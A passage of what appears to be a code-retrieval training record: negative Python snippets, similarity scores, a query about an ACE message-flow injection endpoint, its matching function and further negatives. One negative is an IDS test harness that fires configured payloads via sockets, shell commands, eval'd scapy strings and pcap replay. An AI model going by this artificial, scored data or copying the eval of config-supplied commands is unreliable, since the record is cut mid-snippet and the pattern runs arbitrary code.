self.add_prepared_query(\"get_classes\", get_classes, initNs)\n\n get_properties = \"\"\"\n SELECT ?property\n WHERE {\n ?property rdf:type rdf:Property .\n }\n \"\"\"\n self.add_prepared_query(\"get_properties\", get_properties, None)\n\n get_term_to_label = \"\"\"\n SELECT ?term ?label\n WHERE {\n ?term rdfs:label ?label\n }\n \"\"\"\n self.add_prepared_query(\"get_term_to_label\", get_term_to_label, initNs)\n\n get_term_to_desc = \"\"\"\n SELECT ?term ?desc\n WHERE {\n ?term rdfs:comment ?desc\n }\n \"\"\"\n self.add_prepared_query(\"get_term_to_desc\", get_term_to_desc, initNs)\n\n get_ancestors = \"\"\"\n SELECT ?class\n WHERE {\n ?subject rdfs:subClassOf* ?mid .\n ?mid rdfs:subClassOf* ?class .\n }\n group by ?class\n order by count(?mid)\n \"\"\"\n self.add_prepared_query(\"get_ancestors\", get_ancestors, initNs)", "def iParseQuery(queryResults):\n iPaths = []\n results = queryResults.get_results()\n\n for item in results:\n for k in item.keys():\n if k.icat_key == 'DATA_NAME':\n name = item[k]\n elif k.icat_key == 'COLL_NAME':\n coll = item[k]\n else:\n continue\n iPaths.append(coll+'/'+name)\n return iPaths", "def select_rows_dict_cursor(self, query):\r\n self.connect()\r\n with self.conn.cursor(cursor_factory=DictCursor) as cur:\r\n cur.execute(query)\r\n records = cur.fetchall()\r\n cur.close()\r\n return records", "def get_results(query):\n user_agent = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\n sparql = SPARQLWrapper(\"https://query.wikidata.org/sparql\", agent=user_agent)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n return sparql.query().convert()", "def query(self, qpath):\n return data.Query(self, qpath)", "def get_query(query):\n global database\n res = database.conn.execute(query)\n out = res.fetchall()\n return [dict(zip(i.keys(), i)) for i in out]", "def query_records(self, context, rrs):\n records = self.dns_manager.query_records(context, rrs)\n return records", "def get_all_records(self, data: dict, execution_context: dict):", "def extract_results(self, results: Any) -> dict:\n for nested_attribute in self.nested_results_parts:\n results = getattr(results, nested_attribute)\n return results if isinstance(results, dict) else results()", "def find(self, query, fields=None):\n # get records matching query\n records = [rec for rec in self.__data.values()\n if rec.check_condition(query)]\n\n # handle `fields` argument\n if fields is None:\n # return raw results if fields not given\n results = dict(rec.to_id_dict() for rec in records)\n elif isinstance(fields, str):\n # chose one value from each record\n results = [rec[fields] for rec in records]\n elif isinstance(fields, list):\n # chose only values matching given fields\n results = [rec.get_fields_list(fields) for rec in records]\n else:\n raise TypeError(f\"`fields` should be of one of types: \"\n f\"`None`, `str` or `list`. got: {type(fields)}\")\n\n return results", "def _get_details(self):\n # formulate the query\n query = '''\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n PREFIX proms: <http://promsns.org/def/proms#>\n PREFIX prov: <http://www.w3.org/ns/prov#>\n SELECT *\n WHERE {\n GRAPH ?g {\n <%(uri)s>\n a ?rt ;\n rdfs:label ?label ;\n proms:nativeId ?nid ;\n prov:generatedAtTime ?gat ;\n proms:wasReportedBy ?rs .\n OPTIONAL {\n ?rs rdfs:label ?rs_label .\n }\n OPTIONAL {\n <%(uri)s>\n proms:startingActivity ?sa .\n ?sa rdfs:label ?sa_label .\n }\n OPTIONAL {\n <%(uri)s>\n proms:endingActivity ?ea .\n ?ea rdfs:label ?ea_label .\n } .\n }\n }\n ''' % {'uri': self.uri}\n\n # run the query\n report_details = database.query(query)\n\n # extract results into instance vars\n if report_details and 'results' in report_details:\n if len(report_details['results']['bindings']) > 0:\n ret = report_details['results']['bindings'][0]\n self.rt = ret['rt']['value']\n if 'Basic' in self.rt:\n self.rt_label = 'Basic'\n elif 'Internal' in self.rt:\n self.rt_label = 'Internal'\n elif 'External' in self.rt:\n self.rt_label = 'External'\n self.label = ret['label']['value']\n self.nid = ret['nid']['value']\n self.gat = ret['gat']['value']\n self.rs = ret['rs']['value']\n self.rs_encoded = urllib.parse.quote_plus(self.rs)\n self.rs_label = ret['rs_label']['value'] if 'rs_label' in ret else self.rs\n if 'sa' in ret:\n self.sa = ret['sa']['value']\n self.sa_label = ret['sa_label']['value']\n if 'ea' in ret:\n self.ea = ret['ea']['value']\n self.ea_label = ret['ea_label']['value']", "def records(self) -> Generator[Record, None, None]:\n mapping = [(r, self.get_column(r).name) for r in self.query.refs]\n q = self.compose_query()\n log.info(\"Query: %s\", q)\n with self.engine.connect() as conn:\n rp = conn.execution_options(stream_results=True).execute(q)\n while True:\n rows = rp.fetchmany(size=DATA_PAGE)\n if not len(rows):\n break\n for row in rows:\n row_map = row._mapping\n data: Record = {}\n for ref, name in mapping:\n value = sanitize_text(row_map[name])\n if value is not None:\n data[ref] = value\n yield data", "def collect_queries(\n traversal: Traversal, resources: TaskResources\n) -> Dict[CollectionAddress, str]:\n\n def collect_queries_fn(\n tn: TraversalNode, data: Dict[CollectionAddress, str]\n ) -> None:\n if not tn.is_root_node():\n data[tn.address] = GraphTask(tn, resources).generate_dry_run_query()\n\n env: Dict[CollectionAddress, str] = {}\n traversal.traverse(env, collect_queries_fn)\n return env", "def evaluate(self) -> Dict[str, Any]:\n kwargs = {\"ids\": self._ids}\n return {\n metric.value: self._metric_funcs[metric](\n self._targets, self._preds, **kwargs\n )\n for metric in self._metrics\n }", "def search_all_records(self, data: dict, execution_context: dict):", "def serializeSearchResult( result ):\n print( result.__dict__ )\n return { k: getattr( result, k ) for k in result.__dict__ }", "def _rowsFromQuery(cls, transaction, qry, rozrc):\n rows = yield qry.on(transaction, raiseOnZeroRowCount=rozrc)\n selves = []\n names = [cls.__colmap__[column] for column in list(cls.table)]\n for row in rows:\n self = cls()\n self._attributesFromRow(zip(names, row))\n self.transaction = transaction\n selves.append(self)\n returnValue(selves)" ]
[ "0.57072085", "0.5547496", "0.5542535", "0.55252427", "0.5523193", "0.5461427", "0.5346732", "0.53411245", "0.53293097", "0.53058386", "0.5295658", "0.5276403", "0.52639025", "0.51895535", "0.51621974", "0.5137885", "0.51368797", "0.51255596", "0.51243746", "0.512335", "0.51026887", "0.5096258", "0.50822747", "0.5082043", "0.507847", "0.5070176", "0.50575376", "0.505265", "0.5036707", "0.50300485" ]
0.755422
0
Endpoint to exercise a message. The message is injected into the flow. For this recording and injection must be temporarily enabled on the flow. Test data is obtained, after which instances of ACERecord are created and sorted on flowSequenceNumber. For each record, an object is created with the fromto node+terminal info and also the results of the queries matching either the source or target node+terminal
def post(self, project_type, project, msgflow, node): result = dict() try: ace_conn.start_recording(project_type, project, msgflow) ace_conn.start_injection(project_type, project, msgflow) ace_conn.inject(project_type, project, msgflow, node, request.data) ace_conn.stop_injection(project_type, project, msgflow) ace_conn.stop_recording(project_type, project, msgflow) test_payload = sorted(filter(lambda x: x.application == project and x.message_flow == msgflow, map(lambda x: ACERecord(x), ace_conn.get_recorded_test_data())), key=lambda x: x.flow_sequence_number) ace_conn.delete_recorded_test_data() result = perform_queries(test_payload, project_type, project, msgflow) except ACEAdminConnectionError as e: result = e, 500 except Exception: result = {"error": "An error not related to ACE connections occurred."}, 500 finally: return result, 200
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_echo(self):\n self.add_item(\"skill\", \"fetchai/echo:0.5.0\")\n\n process = self.run_agent()\n is_running = self.is_running(process)\n assert is_running, \"AEA not running within timeout!\"\n\n # add sending and receiving envelope from input/output files\n sender = \"sender\"\n default_dialogues = DefaultDialogues(sender)\n message_content = b\"hello\"\n message = DefaultMessage(\n performative=DefaultMessage.Performative.BYTES,\n dialogue_reference=default_dialogues.new_self_initiated_dialogue_reference(),\n content=message_content,\n )\n sent_envelope = Envelope(\n to=self.agent_name,\n sender=sender,\n protocol_id=message.protocol_id,\n message=message,\n )\n\n self.send_envelope_to_agent(sent_envelope, self.agent_name)\n\n time.sleep(2.0)\n received_envelope = self.read_envelope_from_agent(self.agent_name)\n\n # assert sent_envelope.to == received_envelope.sender\n assert sent_envelope.sender == received_envelope.to\n assert sent_envelope.protocol_id == received_envelope.protocol_id\n msg = DefaultMessage.serializer.decode(received_envelope.message)\n assert sent_envelope.message.content == msg.content\n\n check_strings = (\n \"Echo Handler: setup method called.\",\n \"Echo Behaviour: setup method called.\",\n \"Echo Behaviour: act method called.\",\n \"content={}\".format(message_content),\n )\n missing_strings = self.missing_from_output(process, check_strings)\n assert (\n missing_strings == []\n ), \"Strings {} didn't appear in agent output.\".format(missing_strings)\n\n assert (\n self.is_successfully_terminated()\n ), \"Echo agent wasn't successfully terminated.\"", "def run_message():\n import simplejson\n from ssgateway.message import main\n from yaml import load\n parser = argparse.ArgumentParser(\n description='export a table to a yaml file')\n parser.add_argument('--message', dest='message',\n help='the message to run')\n args, env = initialize_command(parser)\n\n message = simplejson.loads(args.message)\n route_config = env['registry'].settings.get('routes')\n message_router = main(load(open(route_config)))\n message_router(message)\n\n env['closer']()", "def test_generated_protocol_end_to_end(self):\n # AEA components\n ledger_apis = LedgerApis({}, FETCHAI)\n\n wallet_1 = Wallet({FETCHAI: FETCHAI_PRIVATE_KEY_FILE})\n wallet_2 = Wallet({FETCHAI: FETCHAI_PRIVATE_KEY_FILE})\n\n identity_1 = Identity(\n name=\"my_aea_1\",\n address=wallet_1.addresses.get(FETCHAI),\n default_address_key=FETCHAI,\n )\n identity_2 = Identity(\n name=\"my_aea_2\",\n address=wallet_2.addresses.get(FETCHAI),\n default_address_key=FETCHAI,\n )\n\n oef_connection_1 = OEFConnection(\n address=identity_1.address, oef_addr=HOST, oef_port=PORT\n )\n oef_connection_2 = OEFConnection(\n address=identity_2.address, oef_addr=HOST, oef_port=PORT\n )\n\n resources_1 = Resources()\n resources_2 = Resources()\n\n # add generated protocols to resources\n generated_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(\n open(\n os.path.join(\n self.cwd,\n \"tests\",\n \"data\",\n \"generator\",\n \"two_party_negotiation\",\n \"protocol.yaml\",\n )\n )\n )\n )\n generated_protocol = Protocol(\n TwoPartyNegotiationMessage.protocol_id,\n TwoPartyNegotiationSerializer(),\n generated_protocol_configuration,\n )\n resources_1.protocol_registry.register(\n TwoPartyNegotiationMessage.protocol_id, generated_protocol\n )\n resources_2.protocol_registry.register(\n TwoPartyNegotiationMessage.protocol_id, generated_protocol\n )\n\n # create AEAs\n aea_1 = AEA(identity_1, [oef_connection_1], wallet_1, ledger_apis, resources_1)\n aea_2 = AEA(identity_2, [oef_connection_2], wallet_2, ledger_apis, resources_2)\n\n inform_number = tuple((1370, 1991, 1, 4, 17, 6))\n # message 1\n message = TwoPartyNegotiationMessage(\n message_id=1,\n dialogue_reference=(str(0), \"\"),\n target=0,\n performative=TwoPartyNegotiationMessage.Performative.INFORM,\n inform_number=inform_number,\n )\n encoded_message_in_bytes = TwoPartyNegotiationSerializer().encode(message)\n envelope = Envelope(\n to=identity_2.address,\n sender=identity_1.address,\n protocol_id=TwoPartyNegotiationMessage.protocol_id,\n message=encoded_message_in_bytes,\n )\n # message 2\n reply_message = {1: \"number one\", 2: \"number two\", 7: \"number seven\"}\n message_2 = TwoPartyNegotiationMessage(\n message_id=2,\n dialogue_reference=(str(0), \"\"),\n target=1,\n performative=TwoPartyNegotiationMessage.Performative.INFORM_REPLY,\n reply_message=reply_message,\n )\n encoded_message_2_in_bytes = TwoPartyNegotiationSerializer().encode(message_2)\n\n # add handlers to AEA resources\n agent_1_handler = Agent1Handler(\n skill_context=SkillContext(aea_1.context), name=\"fake_skill\"\n )\n resources_1.handler_registry.register(\n (\n PublicId.from_str(\"fetchai/fake_skill:0.1.0\"),\n TwoPartyNegotiationMessage.protocol_id,\n ),\n agent_1_handler,\n )\n agent_2_handler = Agent2Handler(\n encoded_messsage=encoded_message_2_in_bytes,\n skill_context=SkillContext(aea_2.context),\n name=\"fake_skill\",\n )\n resources_2.handler_registry.register(\n (\n PublicId.from_str(\"fetchai/fake_skill:0.1.0\"),\n TwoPartyNegotiationMessage.protocol_id,\n ),\n agent_2_handler,\n )\n\n # add error skill to AEAs\n error_skill_1 = Skill.from_dir(\n os.path.join(AEA_DIR, \"skills\", \"error\"), aea_1.context\n )\n resources_1.add_skill(error_skill_1)\n\n error_skill_2 = Skill.from_dir(\n os.path.join(AEA_DIR, \"skills\", \"error\"), aea_2.context\n )\n resources_2.add_skill(error_skill_2)\n\n # Start threads\n t_1 = Thread(target=aea_1.start)\n t_2 = Thread(target=aea_2.start)\n try:\n t_1.start()\n t_2.start()\n time.sleep(1.0)\n aea_1.outbox.put(envelope)\n time.sleep(5.0)\n assert (\n agent_2_handler.handled_message.message_id == message.message_id\n ), \"Message from Agent 1 to 2: message ids do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference\n == message.dialogue_reference\n ), \"Message from Agent 1 to 2: dialogue references do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference[0]\n == message.dialogue_reference[0]\n ), \"Message from Agent 1 to 2: dialogue reference[0]s do not match\"\n assert (\n agent_2_handler.handled_message.dialogue_reference[1]\n == message.dialogue_reference[1]\n ), \"Message from Agent 1 to 2: dialogue reference[1]s do not match\"\n assert (\n agent_2_handler.handled_message.target == message.target\n ), \"Message from Agent 1 to 2: targets do not match\"\n assert (\n agent_2_handler.handled_message.performative == message.performative\n ), \"Message from Agent 1 to 2: performatives do not match\"\n assert (\n agent_2_handler.handled_message.inform_number == message.inform_number\n ), \"Message from Agent 1 to 2: inform_numbers do not match\"\n\n assert (\n agent_1_handler.handled_message.message_id == message_2.message_id\n ), \"Message from Agent 1 to 2: dialogue references do not match\"\n assert (\n agent_1_handler.handled_message.dialogue_reference\n == message_2.dialogue_reference\n ), \"Message from Agent 2 to 1: dialogue references do not match\"\n assert (\n agent_1_handler.handled_message.dialogue_reference[0]\n == message_2.dialogue_reference[0]\n ), \"Message from Agent 2 to 1: dialogue reference[0]s do not match\"\n assert (\n agent_1_handler.handled_message.dialogue_reference[1]\n == message_2.dialogue_reference[1]\n ), \"Message from Agent 2 to 1: dialogue reference[1]s do not match\"\n assert (\n agent_1_handler.handled_message.target == message_2.target\n ), \"Message from Agent 2 to 1: targets do not match\"\n assert (\n agent_1_handler.handled_message.performative == message_2.performative\n ), \"Message from Agent 2 to 1: performatives do not match\"\n assert (\n agent_1_handler.handled_message.reply_message == message_2.reply_message\n ), \"Message from Agent 1 to 2: reply_messages do not match\"\n time.sleep(2.0)\n finally:\n aea_1.stop()\n aea_2.stop()\n t_1.join()\n t_2.join()", "def setUp(self):\n self.hex_data = \"0251112233445566778899a1a2a3a4a5a6a7a8a9aaabacadae\"\n self.message_id = 0x51\n self.bytes_data = bytearray(unhexlify(self.hex_data))\n self.address = Address(\"112233\")\n self.target = Address(\"445566\")\n self.flags = MessageFlags(0x77)\n self.cmd1 = int(0x88)\n self.cmd2 = int(0x99)\n self.user_data = UserData(unhexlify(\"a1a2a3a4a5a6a7a8a9aaabacadae\"))\n\n self.msg, self.msg_bytes = hex_to_inbound_message(self.hex_data)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )", "def test_queue_attn_xfer(self):\n events = self.run_and_get_events('fixtures/queue/queue_attn_xfer.json')\n\n expected_events = self.events_from_tuples((\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'targets': [CallerId(code=150010002, number='+31150010004', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'callee': CallerId(code=150010002, number='+31150010004', is_public=True),\n }),\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'targets': [CallerId(code=150010003, number='203', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n }),\n ('on_warm_transfer', {\n 'new_id': 'e83df36bebbe-1507037917.120',\n 'merged_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n 'redirector': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n }),\n ('on_hangup', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '203',\n 'reason': 'completed',\n }),\n ))\n\n self.assertEqual(expected_events, events)", "def testEngine(self):\n e = stomper.Engine(testing=True)\n\n # test session connected message:\n msg = \"\"\"CONNECTED\nsession:ID:snorky.local-49191-1185461799654-3:18\n\n\\x00\n\"\"\"\n result = stomper.unpack_frame(msg)\n correct = ''\n returned = e.react(result)\n self.assertEqual(returned, correct)\n\n # test message:\n msg = \"\"\"MESSAGE\ndestination: /queue/a\nmessage-id: some-message-id\n\nhello queue a\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'ACK\\nmessage-id: some-message-id\\n\\n\\x00\\n'\n self.assertEqual(returned, correct)\n\n # test error:\n msg = \"\"\"ERROR\nmessage:some error\n\nThere was a problem with your last message\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'error'\n self.assertEqual(returned, correct)\n\n # test receipt:\n msg = \"\"\"RECEIPT\nmessage-id: some-message-id\n\n\\x00\n\"\"\"\n returned = e.react(msg)\n correct = 'receipt'\n self.assertEqual(returned, correct)", "def test_admit_consume(self):\n\n rule = ('admit (name:\"one\"; match:\"AB\";)\\n'\n 'alert (name:\"two\"; match:\"BC\";)')\n\n tests = {\n \"ABC\": [\"proxying connection from\"]\n }\n\n self.run_rules(rule, tests)", "def invoke(self, msg, req):\n if msg.name == 'forward':\n init = Initializer.create_init()\n try:\n init.timer()\n return\n except Exception, e:\n print 'Error', e.message\n else:\n raise schema.AvroException('unexpected message:', msg.getname())", "def doTest(self, module, payloads):\n for payload in payloads:\n # Perform test & write report\n str = \"TEST #%s - %s\" % (self.testnum, payload[0])\n print str[:62].ljust(65,'.'),\n #test_dt_start = datetime.datetime.now()\n test_dt_start = time.strftime('%Y-%m-%d %H:%M:%S')\n pattern = \"\"\n\n if payload[1] == \"socket\":\n cmd = self.commandParser('socket', payload[4])\n (test_port, test_proto) = (payload[2], payload[3].lower())\n test_payload = cmd\n if payload[3].lower() == 'tcp':\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n else:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((self._target,payload[2]))\n s.send(cmd)\n pattern = payload[5]\n s.close()\n elif payload[1] == \"command\":\n cmd = self.commandParser('command', payload[2])\n (test_port, test_proto) = (None, None)\n test_payload = ' '.join(cmd)\n if self._debug==1:\n print \"\\n\\n***Debug: sending command: %s\" % ' '.join(cmd)\n subprocess.call(cmd)\n else:\n subprocess.call(cmd, stdout=subprocess.PIPE)\n pattern = payload[3]\n elif payload[1] == \"scapy\":\n cmd = self.commandParser('scapy', payload[2])\n if self._debug == 1:\n print \"\\n\\n***Debug: sending scapy payload: %s\" % cmd\n cmd = cmd.replace('verbose=0', 'verbose=1')\n (test_port, test_proto) = (None, None)\n test_payload = cmd\n eval(cmd)\n pattern = payload[3]\n elif payload[1] == \"pcap\":\n pcap = os.path.join(self.config.get('PATHS', 'pcapdir'), payload[2])\n (test_port, test_proto) = (None, None)\n test_payload = pcap\n if self._debug == 1:\n # verbose mode\n print \"Pcap Replay file\"\n cmd = [self.config.get('ENV','sudo'), self.config.get('ENV','tcpreplay'), '-i', self.config.get('CLIENT','iface'), pcap]\n else:\n # quiet mode\n cmd = [self.config.get('ENV','sudo'), self.config.get('ENV','tcpreplay'), '-q', '-i', self.config.get('CLIENT','iface'), pcap]\n if self._debug==1:\n subprocess.call(cmd)\n else:\n subprocess.call(cmd, stdout=subprocess.PIPE)\n pattern = payload[3]\n\n test_dt_end = time.strftime('%Y-%m-%d %H:%M:%S')\n\n # Sleep before getting alerts\n time.sleep(int(self.config.get('TIMING', 'sleepbeforegetalerts')))\n\n # Get new alerts and calculate new offset\n self.getAlertsFile()\n res = self.getAlertsFromOffset(self.config.get('PATHS', 'tempfile'), self.offset)\n\n # Sig matching\n if pattern != \"\":\n if re.search(pattern, res):\n test_flag = 2\n else:\n if res == '':\n test_flag = 0\n else:\n test_flag = 1\n test_sig_match = pattern\n else:\n test_sig_match = None\n test_flag = None\n\n test_alert = res\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n database.DB(self._cnf).addTestResult((module, payload[1], test_dt_start,\n test_dt_end, payload[0], test_port, test_proto, test_payload,\n test_sig_match, res, test_flag))\n\n print \"[ done ]\"\n \n # Sleep before next test\n time.sleep(int(self.config.get('TIMING', 'sleepbeforenexttest')))\n self.testnum += 1", "def analytic(ctx, src, analytic_addr, verbose):\n\n client = TestClient(src, analytic_addr=analytic_addr, verbose=False)\n client.run()", "def install_sample(self, datapath, table_id):\n parser = datapath.ofproto_parser\n ofproto = datapath.ofproto\n # Incoming port 1.\n in_port = 1;\n for timeout in range(60, 1 ,-1):\n # Incoming Ethernet destination\n match = self.create_match(parser,\n {ofproto.OXM_OF_METADATA: timeout})\n # Output to port 2.\n output = parser.OFPActionOutput(2, 0)\n write = parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n [output])\n instructions = [write]\n flow_mod = self.create_flow_add(datapath, 100, timeout,\n table_id, match, instructions)\n datapath.send_msg(flow_mod)\n\n print \"sent flow_mod\"", "def run_example(host, port):\r\n print \"host is %s:%d\"%(host,port)\r\n setup_db(\"sqlite:///torflow.sqlite\", echo=False)\r\n\r\n #l_session = tc_session()\r\n #print l_session.query(((func.count(Extension.id)))).filter(and_(FailedExtension.table.c.row_type=='extension', FailedExtension.table.c.from_node_idhex == \"7CAA2F5F998053EF5D2E622563DEB4A6175E49AC\")).one()\r\n #return\r\n #for e in Extension.query.filter(FailedExtension.table.c.row_type=='extension').all():\r\n # if e.from_node: print \"From: \"+e.from_node.idhex+\" \"+e.from_node.nickname\r\n # if e.to_node: print \"To: \"+e.to_node.idhex+\" \"+e.to_node.nickname\r\n #tc_session.remove()\r\n #return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n c = Connection(s)\r\n th = c.launch_thread()\r\n c.authenticate(control_pass)\r\n c.set_event_handler(TorCtl.ConsensusTracker(c))\r\n c.add_event_listener(ConsensusTrackerListener())\r\n c.add_event_listener(CircuitListener())\r\n\r\n print `c.extend_circuit(0,[\"moria1\"])`\r\n try:\r\n print `c.extend_circuit(0,[\"\"])`\r\n except TorCtl.ErrorReply: # wtf?\r\n print \"got error. good.\"\r\n except:\r\n print \"Strange error\", sys.exc_info()[0]\r\n \r\n c.set_events([EVENT_TYPE.STREAM, EVENT_TYPE.CIRC,\r\n EVENT_TYPE.NEWCONSENSUS, EVENT_TYPE.NEWDESC,\r\n EVENT_TYPE.ORCONN, EVENT_TYPE.BW], True)\r\n\r\n th.join()\r\n return", "def test_transform_simple(self):\n transformer = SnmpTransformer()\n transformer.setup(\"test\",{\n \"mib_dir\" : \"/dev/null\"\n })\n transformer.registered_mibs += (transformer.parse_file({\n \"EVENT test_event .1.3.6.1.4.1.2021.13.990.0.17 \\\"test category\\\" severity\" : 0,\n \"FORMAT $*\" : 1\n }))\n str = 'HOST:testhost.localdomain;IP:UDP: [127.0.5.1]:50935;VARS:.1.3.6.1.2.1.1.3.0 = 2:22:16:27.46 ; .1.3.6.1.6.3.1.1.4.1.0 = .1.3.6.1.4.1.2021.13.990.0.17 ; .1.3.6.1.2.1.1.6.0 = Argument 1 ; .1.3.6.1.6.3.18.1.3.0 = 127.0.0.1 ; .1.3.6.1.6.3.18.1.4.0 = \"public\" ; .1.3.6.1.6.3.1.1.4.3.0 = .1.3.6.1.4.1.2021.13.990'\n event = transformer.transform(str)\n assert event[\"trap_oid\"] == \".1.3.6.1.4.1.2021.13.990.0.17\"\n assert event[\"host_address\"] == \"127.0.5.1\"\n assert event[\"host_name\"] == \"testhost.localdomain\"\n assert event[\"message\"] == \"Argument 1\"", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "async def flow(self, session: ClientSession, data: Dict) -> None:", "def testInterrogate(self):\n\n flow_name = \"Interrogate\"\n\n with test_lib.Stubber(flow.GRRFlow, \"SendReply\", self.MockSendReply):\n # Run the flow in the simulated way\n for _ in test_lib.TestFlowHelper(flow_name, InterrogatedClient(),\n token=self.token,\n client_id=self.client_id):\n pass\n\n # Now check that the AFF4 object is properly set\n fd = aff4.FACTORY.Open(self.client_id, token=self.token)\n\n self.assertEqual(fd.Get(fd.Schema.HOSTNAME), \"test_node\")\n self.assertEqual(fd.Get(fd.Schema.SYSTEM), \"Linux\")\n self.assertEqual(fd.Get(fd.Schema.INSTALL_DATE), 100 * 1000000)\n\n # Check the client info\n info = fd.Get(fd.Schema.CLIENT_INFO)\n\n self.assertEqual(info.client_name, config_lib.CONFIG[\"Client.name\"])\n self.assertEqual(info.client_version,\n int(config_lib.CONFIG[\"Client.version_numeric\"]))\n self.assertEqual(info.build_time, config_lib.CONFIG[\"Client.build_time\"])\n\n # Check the client config\n config_info = fd.Get(fd.Schema.GRR_CONFIG)\n self.assertEqual(config_info.location, \"http://www.example.com\")\n self.assertEqual(config_info.poll_min, 1.0)\n\n # Check that the index has been updated.\n index_fd = aff4.FACTORY.Create(fd.Schema.client_index, \"AFF4Index\",\n mode=\"r\", token=self.token)\n\n self.assertEqual(\n [fd.urn],\n [x for x in index_fd.Query([fd.Schema.HOSTNAME], \".*test.*\")])\n\n # Check for notifications\n user_fd = aff4.FACTORY.Open(\"aff4:/users/test\", token=self.token)\n notifications = user_fd.Get(user_fd.Schema.PENDING_NOTIFICATIONS)\n\n self.assertEqual(len(notifications), 1)\n notification = notifications[0]\n\n self.assertEqual(notification.subject, rdfvalue.RDFURN(self.client_id))\n\n # Check that reply sent from the flow is correct\n self.assertEqual(self.flow_reply.client_info.client_name,\n config_lib.CONFIG[\"Client.name\"])\n self.assertEqual(self.flow_reply.client_info.client_version,\n int(config_lib.CONFIG[\"Client.version_numeric\"]))\n self.assertEqual(self.flow_reply.client_info.build_time,\n config_lib.CONFIG[\"Client.build_time\"])\n\n self.assertEqual(self.flow_reply.system_info.system, \"Linux\")\n self.assertEqual(self.flow_reply.system_info.node, \"test_node\")\n self.assertEqual(self.flow_reply.system_info.release, \"5\")\n self.assertEqual(self.flow_reply.system_info.version, \"2\")\n self.assertEqual(self.flow_reply.system_info.machine, \"i386\")\n\n users = list(fd.Get(fd.Schema.USER))\n self.assertEqual(len(users), 3)\n self.assertEqual(users[0].username, \"Foo\")\n self.assertEqual(users[1].username, \"Bar\")\n self.assertEqual(users[2].username, u\"文德文\")\n self.assertEqual(str(fd.Get(fd.Schema.USERNAMES)),\n \"Foo Bar 文德文\")\n\n net_fd = fd.OpenMember(\"network\")\n interfaces = list(net_fd.Get(net_fd.Schema.INTERFACES))\n self.assertEqual(interfaces[0].mac_address, \"123456\")\n self.assertEqual(interfaces[0].addresses[0].human_readable, \"127.0.0.1\")\n self.assertEqual(socket.inet_ntoa(interfaces[0].addresses[0].packed_bytes),\n \"127.0.0.1\")\n\n # Mac addresses should be available as hex for searching\n mac_addresses = fd.Get(fd.Schema.MAC_ADDRESS)\n self.assertTrue(\"123456\".encode(\"hex\") in str(mac_addresses))\n\n # Check that virtual directories exist for the mount points\n fd = aff4.FACTORY.Open(self.client_id.Add(\"fs/os/mnt/data\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n fd = aff4.FACTORY.Open(self.client_id.Add(\"fs/tsk/dev/sda\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n fd = aff4.FACTORY.Open(self.client_id.Add(\"devices/dev/sda\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n # Check flow's reply\n self.assertEqual(len(self.flow_reply.users), 3)\n self.assertEqual(self.flow_reply.users[0].username, \"Foo\")\n self.assertEqual(self.flow_reply.users[1].username, \"Bar\")\n self.assertEqual(self.flow_reply.users[2].username, u\"文德文\")\n\n self.assertEqual(len(self.flow_reply.interfaces), 1)\n self.assertEqual(self.flow_reply.interfaces[0].mac_address, \"123456\")\n\n # Check that the client summary was published to the event listener.\n self.assertEqual(DiscoveryTestEventListener.event.client_id, self.client_id)\n self.assertEqual(\n DiscoveryTestEventListener.event.interfaces[0].mac_address,\n \"123456\")\n\n # Check that label indexes are updated.\n self.assertEqual(\n list(search.SearchClients(\"label:Label2\", token=self.token)),\n [self.client_id])", "def test_examine(self):\n SimpleServer.theAccount.addMailbox('test-mailbox')\n self.examinedArgs = None\n def login():\n return self.client.login(b'testuser', b'password-test')\n def examine():\n def examined(args):\n self.examinedArgs = args\n self._cbStopClient(None)\n d = self.client.examine('test-mailbox')\n d.addCallback(examined)\n return d\n\n d1 = 